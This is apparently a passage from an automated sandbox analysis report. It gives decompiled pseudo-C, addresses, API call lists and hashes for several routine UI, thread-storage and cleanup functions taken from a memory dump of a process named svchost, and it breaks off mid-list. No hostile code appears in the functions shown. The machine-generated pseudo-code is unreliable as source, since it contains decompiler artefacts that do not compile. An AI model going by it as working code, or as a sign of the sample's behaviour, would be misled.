									__eflags = _t22 - 0xffffffff;
									if(_t22 == 0xffffffff) {
										goto L11;
									} else {
										goto L9;
									}
								} else {
									_t22 = 0;
									L9:
									_t16 = _a4 + 0x14; // 0x14
									_t51 = E004135B0(_t16, _t22, 0) + 0x18;
									_t52 = _t51 + E0040C020(_t16, _t51);
									_t54 =  *(_t52 + E0040C020(_t16, _t52) + 0x14);
									if(_t54 == 0) {
										goto L11;
									} else {
										SetCursor(_t54);
										return 1;
									}
								}
							}
						} else {
							GetCursorPos( &_v24);
							GetClientRect( *(_t49 + 0x1c),  &_v16);
							E00489AC0(_t49,  &_v16);
							_push(_v24.x);
							_t35 = PtInRect( &(_v24.y), _v28);
							_t61 = _t35;
							if(_t35 == 0) {
								goto L11;
							} else {
								goto L5;
							}
						}
					} else {
						goto L11;
					}
				}
			}














    0x0041e925
    0x0041e929
    0x0041e92d
    0x0041ea16
    0x0041ea16
    0x0041ea1c
    0x0041e933
    0x0041e933
    0x0041e938
    0x0041e94d
    0x0041e992
    0x0041e9b7
    0x00000000
    0x0041e9b9
    0x0041e9bc
    0x0041e9c9
    0x0041e9ce
    0x0041e9d1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041e9be
    0x0041e9be
    0x0041e9d3
    0x0041e9da
    0x0041e9e4
    0x0041e9ed
    0x0041e9fa
    0x0041e9ff
    0x00000000
    0x0041ea01
    0x0041ea02
    0x0041ea12
    0x0041ea12
    0x0041e9ff
    0x0041e9bc
    0x0041e94f
    0x0041e954
    0x0041e963
    0x0041e970
    0x0041e97d
    0x0041e984
    0x0041e98a
    0x0041e98c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041e98c
    0x00000000
    0x00000000
    0x00000000
    0x0041e938

    APIs
    • IsChild.USER32(?,?), ref: 0041E93C
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    • GetCursorPos.USER32(?), ref: 0041E954
    • GetClientRect.USER32(?,?), ref: 0041E963
    • PtInRect.USER32(?,?,?), ref: 0041E984
    • SetCursor.USER32(?,?,00000000,?,?,?,?,0041E5B0), ref: 0041EA02
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChildCursorRect$ClientParent
    • String ID:
    • API String ID: 1110532797-0
    • Opcode ID: b0e6905633e18e50bcb4648608da776763fa336234f04bdfda1038f0afd0105f
    • Instruction ID: 584ce7fbb5ed5a0ec7dbdbd8b360fda0c2de13dd30a0654e591be6c6ea2a37c2
    • Opcode Fuzzy Hash: b0e6905633e18e50bcb4648608da776763fa336234f04bdfda1038f0afd0105f
    • Instruction Fuzzy Hash: C221E675600211ABC720EB26DC45FDF73E8AF94758F084A2FF845A3281E778E945C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C7C0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E0040C7C0(void* __ecx, void* __edi, void* __ebp) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				char _v40;
				struct tagRECT _v56;
				char _v60;
				struct tagRECT _v76;
				struct HBRUSH__* _t43;
				intOrPtr _t76;

				_push(0xffffffff);
				_push(E0048DD98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t76;
				_t72 = __ecx;
				_t80 =  *((intOrPtr*)(__ecx + 0x6c));
				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
					E00484BEB(__ecx);
					__eflags = 0;
					 *[fs:0x0] = _v12;
					return 0;
				} else {
					_push(__ecx);
					E00489CCA( &_v32, _t80);
					_v8 = 0;
					GetClientRect( *(__ecx + 0x1c),  &(_v56.top));
					GetWindowRect( *(_t72 + 0x1c),  &(_v76.right));
					E00489A84(_t72,  &(_v76.right));
					OffsetRect( &_v56,  ~(_v76.top),  ~(_v76.right.left));
					E004899C1( &_v40,  &_v56);
					OffsetRect( &_v76,  ~(_v76.left),  ~(_v76.top));
					_t43 = _t72 + 0xa8;
					_t81 = _t43;
					if(_t43 != 0) {
						_t43 =  *(_t43 + 4);
					}
					FillRect(_v32,  &(_v76.right), _t43);
					E0048551D(_t72, 0x85, 1, 0);
					_v32 = 0xffffffff;
					E00489D3C( &_v60, _t81);
					 *[fs:0x0] = _v40;
					return 0;
				}
			}












    0x0040c7c6
    0x0040c7c8
    0x0040c7cd
    0x0040c7ce
    0x0040c7d9
    0x0040c7de
    0x0040c7e0
    0x0040c8b7
    0x0040c8c0
    0x0040c8c3
    0x0040c8cd
    0x0040c7e6
    0x0040c7e7
    0x0040c7ec
    0x0040c7fa
    0x0040c802
    0x0040c811
    0x0040c81e
    0x0040c83c
    0x0040c847
    0x0040c85f
    0x0040c861
    0x0040c868
    0x0040c86a
    0x0040c86c
    0x0040c86c
    0x0040c87a
    0x0040c88b
    0x0040c894
    0x0040c89c
    0x0040c8a8
    0x0040c8b2
    0x0040c8b2

    APIs
      • Part of subcall function 00489CCA: __EH_prolog.LIBCMT ref: 00489CCF
      • Part of subcall function 00489CCA: GetWindowDC.USER32(?,?,?,0040C7F1), ref: 00489CF8
    • GetClientRect.USER32 ref: 0040C802
    • GetWindowRect.USER32(?,?), ref: 0040C811
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000000), ref: 00489A98
      • Part of subcall function 00489A84: ScreenToClient.USER32(?,00000008), ref: 00489AA1
    • OffsetRect.USER32(?,?,?), ref: 0040C83C
      • Part of subcall function 004899C1: ExcludeClipRect.GDI32(?,?,?,?,?,775D4410,?,?,0040C84C,?), ref: 004899E6
      • Part of subcall function 004899C1: ExcludeClipRect.GDI32(?,?,?,?,?,775D4410,?,?,0040C84C,?), ref: 004899FB
    • OffsetRect.USER32(?,?,?), ref: 0040C85F
    • FillRect.USER32(?,?,?), ref: 0040C87A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Client$ClipExcludeOffsetScreenWindow$FillH_prolog
    • String ID:
    • API String ID: 2829754061-0
    • Opcode ID: f62f079a9813574644149a42f7d236a8fa0f07d6940db670fb5dcb35bcf5f822
    • Instruction ID: 20d7f857f383c394fcf8cdc1da832a05d3a4ed9262b6376e31d327af2255b482
    • Opcode Fuzzy Hash: f62f079a9813574644149a42f7d236a8fa0f07d6940db670fb5dcb35bcf5f822
    • Instruction Fuzzy Hash: 12314FB5208702AFD714EB64C845EABB7E8EBD4714F008E1EF49687290DB78E905CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00474C35 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE
    Download Yara Rule
    C-Code - Quality: 100%
    			E00474C35() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x4b995c);
				if(_t16 == 0) {
					_t16 = E004724F2(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x4b995c, _t16) == 0) {
						E0046FE64(0x10);
					} else {
						E00474C22(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






    0x00474c43
    0x00474c4b
    0x00474c4f
    0x00474c5a
    0x00474c60
    0x00474c8a
    0x00474c73
    0x00474c74
    0x00474c7a
    0x00474c80
    0x00474c84
    0x00474c84
    0x00474c60
    0x00474c91
    0x00474c9b

    APIs
    • GetLastError.KERNEL32(00000001,?,00472142,0047AF55,00000000,0047BED2,?,?,00000001,00000800,?,?,?,0047A1BB,?,00000000), ref: 00474C37
    • TlsGetValue.KERNEL32(?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C45
    • SetLastError.KERNEL32(00000000,?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C91
      • Part of subcall function 004724F2: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 004725E8
    • TlsSetValue.KERNEL32(00000000,?,0047A1BB,?,00000000,?,00479BEB,00000000,00000000,00000000), ref: 00474C69
    • GetCurrentThreadId.KERNEL32 ref: 00474C7A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorLastValue$AllocateCurrentHeapThread
    • String ID:
    • API String ID: 2047054392-0
    • Opcode ID: 93443bb33d3c57b0c1705f2b229b1c5a4e34b309320ee102034d662c6829ac26
    • Instruction ID: 4952c5b9feba21f4ff80468edf74b1910457279f621e2955d8236ee4b481fe21
    • Opcode Fuzzy Hash: 93443bb33d3c57b0c1705f2b229b1c5a4e34b309320ee102034d662c6829ac26
    • Instruction Fuzzy Hash: 13F09C315023127FD7351B65BF096663A54AB51771711823BF649952A0DB748C01875C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048C889 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E0048C889(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t15;
				intOrPtr _t16;
				long* _t17;

				_t17 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t17 + 0x14; // 0xe144e8
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t16 =  *((intOrPtr*)(_t5 + 4));
						E0048CB55(_t17, _t5, 0);
						_t5 = _t16;
					} while (_t16 != 0);
				}
				_t3 = _t17 + 0x10; // 0xe05b70
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t15 = GlobalHandle(_t6);
					GlobalUnWire(_t15);
					GlobalFree(_t15);
				}
				return  *0x492294(_t17 + 0x1c);
			}









    0x0048c88a
    0x0048c88d
    0x0048c892
    0x0048c895
    0x0048c895
    0x0048c89b
    0x0048c89b
    0x0048c8a0
    0x0048c8a2
    0x0048c8a2
    0x0048c8aa
    0x0048c8b1
    0x0048c8b1
    0x0048c8a2
    0x0048c8b5
    0x0048c8b5
    0x0048c8ba
    0x0048c8c3
    0x0048c8c6
    0x0048c8cd
    0x0048c8cd
    0x0048c8df

    APIs
    • TlsFree.KERNEL32(00000000,?,?,0048CD96,00000000,00000001), ref: 0048C895
    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C8BD
    • GlobalUnWire.KERNEL32(00000000), ref: 0048C8C6
    • GlobalFree.KERNEL32(00000000), ref: 0048C8CD
    • RtlDeleteCriticalSection.NTDLL(004E1400), ref: 0048C8D7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$Free$CriticalDeleteHandleSectionWire
    • String ID:
    • API String ID: 1964465133-0
    • Opcode ID: 85285146415c435480c3c8a57195ce242a28e958660d374092473d137e5f96cf
    • Instruction ID: 3fe8a8c665fc4e58613a992b13536275436d77c7c7daa4008b91f31838d75c49
    • Opcode Fuzzy Hash: 85285146415c435480c3c8a57195ce242a28e958660d374092473d137e5f96cf
    • Instruction Fuzzy Hash: 21F0B435240610AFD2207B29AE48A2F73ADAF90711705097BF905D3350CBB4DC058778
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414DA0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E00414DA0(unsigned int __ecx, void* __ebp, void* __eflags) {
				intOrPtr _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* __edi;
				void* _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				void* _t160;
				intOrPtr* _t162;
				intOrPtr* _t163;
				void* _t165;
				unsigned int _t166;
				intOrPtr _t169;

				 *[fs:0x0] = _t169;
				_t166 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x495ee0;
				_v4 = 0x21;
				E00418600(__ecx, 0);
				 *0x492294(0x4c9e70, _t160, _t165,  *[fs:0x0], E0048E649, 0xffffffff);
				_v12 = 0x20;
				 *((intOrPtr*)(_t166 + 0x410)) = 0x495e50;
				E0040B7D0(_t166 + 0x410);
				_v12 = 0x1f;
				 *((intOrPtr*)(_t166 + 0x3c8)) = 0x495f7c;
				E00485312(_t166 + 0x3c8);
				_v12 = 0x1e;
				 *((intOrPtr*)(_t166 + 0x3b8)) = 0x496034;
				if( *((intOrPtr*)(_t166 + 0x3bc)) == 0) {
					_t123 =  *((intOrPtr*)(_t166 + 0x3c4));
					if(_t123 != 0) {
						 *_t123();
					}
				}
				_v8 = 0x1d;
				E00482377(_t166 + 0x3a4);
				_v8 = 0x1c;
				E0042A510(_t166 + 0x394);
				_v8 = 0x1b;
				 *((intOrPtr*)(_t166 + 0x384)) = 0x496034;
				if( *((intOrPtr*)(_t166 + 0x388)) == 0) {
					_t121 =  *((intOrPtr*)(_t166 + 0x390));
					if(_t121 != 0) {
						 *_t121();
					}
				}
				_v8 = 0x1a;
				 *((intOrPtr*)(_t166 + 0x370)) = 0x496034;
				if( *((intOrPtr*)(_t166 + 0x374)) == 0) {
					_t119 =  *((intOrPtr*)(_t166 + 0x37c));
					if(_t119 != 0) {
						 *_t119();
					}
				}
				_v8 = 0x19;
				E00433CE0(_t166 + 0x354);
				_v8 = 0x18;
				E00427FE0(_t166 + 0x2a4);
				_v8 = 0x17;
				 *((intOrPtr*)(_t166 + 0x290)) = 0x495e50;
				E0040B7D0(_t166 + 0x290);
				_v8 = 0x16;
				 *((intOrPtr*)(_t166 + 0x268)) = 0x495e50;
				E0040B7D0(_t166 + 0x268);
				_v8 = 0x15;
				 *((intOrPtr*)(_t166 + 0x254)) = 0x495e50;
				E0040B7D0(_t166 + 0x254);
				_v8 = 0x14;
				 *((intOrPtr*)(_t166 + 0x240)) = 0x495e50;
				E0040B7D0(_t166 + 0x240);
				_v8 = 0x13;
				 *((intOrPtr*)(_t166 + 0x22c)) = 0x495e50;
				E0040B7D0(_t166 + 0x22c);
				_v8 = 0x12;
				 *((intOrPtr*)(_t166 + 0x214)) = 0x495e50;
				E0040B7D0(_t166 + 0x214);
				_v8 = 0x11;
				 *((intOrPtr*)(_t166 + 0x200)) = 0x495e50;
				E0040B7D0(_t166 + 0x200);
				_v8 = 0x10;
				 *((intOrPtr*)(_t166 + 0x1ec)) = 0x495e50;
				E0040B7D0(_t166 + 0x1ec);
				_v8 = 0xf;
				E004832C2(_t166 + 0x1d0);
				_v8 = 0xe;
				E004832C2(_t166 + 0x1cc);
				_v8 = 0xd;
				E004823D7(_t166 + 0x1b4);
				_v8 = 0xc;
				 *((intOrPtr*)(_t166 + 0x1a0)) = 0x495e50;
				E0040B7D0(_t166 + 0x1a0);
				_v8 = 0xb;
				 *((intOrPtr*)(_t166 + 0x184)) = 0x495e50;
				E0040B7D0(_t166 + 0x184);
				_v8 = 0xa;
				 *((intOrPtr*)(_t166 + 0x170)) = 0x495e50;
				E0040B7D0(_t166 + 0x170);
				_v8 = 9;
				 *((intOrPtr*)(_t166 + 0x15c)) = 0x495e50;
				E0040B7D0(_t166 + 0x15c);
				_v8 = 8;
				 *((intOrPtr*)(_t166 + 0x148)) = 0x495e50;
				E0040B7D0(_t166 + 0x148);
				_v8 = 7;
				 *((intOrPtr*)(_t166 + 0x134)) = 0x495e50;
				E0040B7D0(_t166 + 0x134);
				_v8 = 6;
				 *((intOrPtr*)(_t166 + 0x120)) = 0x495e50;
				E0040B7D0(_t166 + 0x120);
				_t162 = _t166 + 0x104;
				_v20 = _t162;
				 *_t162 = 0x496038;
				_v8 = 0x22;
				E00414590();
				 *_t162 = 0x496044;
				_t163 = _t162 + 8;
				_v8 = 0x23;
				E0040B7D0(_t163);
				_v8 = 5;
				 *_t163 = 0x495e50;
				E0040B7D0(_t163);
				_v8 = 4;
				E004823D7(_t166 + 0xf0);
				_v8 = 3;
				E004823D7(_t166 + 0xdc);
				_v8 = 2;
				E004832C2(_t166 + 0xd8);
				_v8 = 1;
				E004832C2(_t166 + 0xd4);
				_v8 = 0;
				E004832C2(_t166 + 0xd0);
				_v8 = 0xffffffff;
				_t118 = E0048CF0C(_t166, _t163);
				 *[fs:0x0] = _v16;
				return _t118;
			}



















    0x00414dae
    0x00414db9
    0x00414dbc
    0x00414dc0
    0x00414dc8
    0x00414dd0
    0x00414dda
    0x00414de6
    0x00414deb
    0x00414df1
    0x00414dfc
    0x00414e01
    0x00414e07
    0x00414e19
    0x00414e1e
    0x00414e24
    0x00414e26
    0x00414e2e
    0x00414e30
    0x00414e30
    0x00414e2e
    0x00414e38
    0x00414e3d
    0x00414e48
    0x00414e4d
    0x00414e58
    0x00414e5f
    0x00414e65
    0x00414e67
    0x00414e6f
    0x00414e71
    0x00414e71
    0x00414e6f
    0x00414e79
    0x00414e80
    0x00414e86
    0x00414e88
    0x00414e90
    0x00414e92
    0x00414e92
    0x00414e90
    0x00414e9a
    0x00414e9f
    0x00414eaa
    0x00414eaf
    0x00414eba
    0x00414ebf
    0x00414ec5
    0x00414ed0
    0x00414ed5
    0x00414edb
    0x00414ee6
    0x00414eeb
    0x00414ef1
    0x00414efc
    0x00414f01
    0x00414f07
    0x00414f12
    0x00414f17
    0x00414f1d
    0x00414f28
    0x00414f2d
    0x00414f33
    0x00414f3e
    0x00414f43
    0x00414f49
    0x00414f54
    0x00414f59
    0x00414f5f
    0x00414f6a
    0x00414f6f
    0x00414f7a
    0x00414f7f
    0x00414f8a
    0x00414f8f
    0x00414f9a
    0x00414f9f
    0x00414fa5
    0x00414fb0
    0x00414fb5
    0x00414fbb
    0x00414fc6
    0x00414fcb
    0x00414fd1
    0x00414fdc
    0x00414fe1
    0x00414fe7
    0x00414ff2
    0x00414ff7
    0x00414ffd
    0x00415008
    0x0041500d
    0x00415013
    0x0041501e
    0x00415023
    0x00415029
    0x0041502e
    0x00415034
    0x00415038
    0x0041503e
    0x00415045
    0x0041504a
    0x00415050
    0x00415053
    0x0041505a
    0x00415061
    0x00415066
    0x0041506c
    0x00415077
    0x0041507c
    0x00415087
    0x0041508c
    0x00415097
    0x0041509c
    0x004150a7
    0x004150ac
    0x004150b7
    0x004150bc
    0x004150c3
    0x004150cb
    0x004150d6
    0x004150e0

    APIs
      • Part of subcall function 00418600: GetCurrentThreadId.KERNEL32 ref: 00418625
      • Part of subcall function 00418600: IsWindow.USER32(?), ref: 00418641
      • Part of subcall function 00418600: SendMessageA.USER32(?,000083E7,?,00000000), ref: 0041865A
      • Part of subcall function 00418600: ExitProcess.KERNEL32 ref: 0041866F
    • RtlDeleteCriticalSection.NTDLL(004C9E70), ref: 00414DDA
      • Part of subcall function 00485312: __EH_prolog.LIBCMT ref: 00485317
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalCurrentDeleteExitH_prologMessageProcessSectionSendThreadWindow
    • String ID: MA$!$#
    • API String ID: 2888814780-3251899075
    • Opcode ID: 4d2f5031a7e898074db9723be213ce35515f3ba766ccf89a22660fc2200dbec8
    • Instruction ID: f26473f98b07d922f5c367bcb46e04e340de632832149cdc3999efbca82ae59e
    • Opcode Fuzzy Hash: 4d2f5031a7e898074db9723be213ce35515f3ba766ccf89a22660fc2200dbec8
    • Instruction Fuzzy Hash: E49185300087818EDB12EF75C05479ABFE4AFA5348F64085EE4D607392DBB95249C7AB
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048900A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E0048900A(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int* _t46;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					GlobalFix( *__ecx);
					_t67 = _t46;
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E00488E8D(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t75 = _t93 + 2 + E004732E5(_t84 + _t93) * 2;
					}
					_t26 = _t84 + 3; // 0x3
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00470EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00470EA0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnWire( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}




















    0x00489016
    0x00489019
    0x00489026
    0x0048902c
    0x00489030
    0x0048903f
    0x00489042
    0x00489049
    0x00489044
    0x00489044
    0x00489044
    0x00489053
    0x00489055
    0x0048905c
    0x00489061
    0x00489069
    0x00489063
    0x00489063
    0x00489063
    0x00489083
    0x0048908c
    0x0048908e
    0x00489090
    0x00489096
    0x004890a2
    0x004890a2
    0x004890a9
    0x004890ad
    0x004890b3
    0x004890b6
    0x004890bd
    0x004890c5
    0x004890bf
    0x004890bf
    0x004890bf
    0x004890cc
    0x004890de
    0x004890e3
    0x004890e3
    0x004890f3
    0x004890fd
    0x00489102
    0x0048910d
    0x00489110
    0x00489116
    0x0048911c
    0x00000000
    0x0048911e
    0x00000000

    APIs
    • GlobalFix.KERNEL32 ref: 00489026
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00489079
    • GlobalUnWire.KERNEL32(?), ref: 00489110
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
